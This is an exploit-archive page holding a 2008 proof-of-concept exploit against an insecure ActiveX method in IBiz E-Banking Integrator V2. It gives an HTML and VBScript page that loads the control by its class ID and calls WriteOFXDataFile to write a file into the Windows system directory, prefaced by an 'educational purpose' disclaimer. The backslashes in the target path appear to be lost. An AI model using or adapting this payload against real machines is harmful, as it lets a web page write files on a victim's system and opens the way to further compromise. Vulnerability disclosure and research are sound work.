[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method Exploit
# Published : 2008-04-09
# Author : shinnai
# Previous Title : HP OpenView Network Node Manager <= 7.53 Multiple Vulnerabilities
# Next Title : Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods
--------------------------------------------------------------------
IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
More info at http://shinnai.altervista.org
--------------------------------------------------------------------
<object classid='clsid:24445430-F789-11CE-86F8-0020AFD8C6DB' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe()
On Error Resume Next
test.WriteOFXDataFile "C:WINDOWSsystem_.ini"
If Err.Number <> 0 Then
MsgBox "Something went wrong!"
Else
MsgBox "Exploit Completed!"
End If
End Sub
</script>
# www.Syue.com [2008-04-09]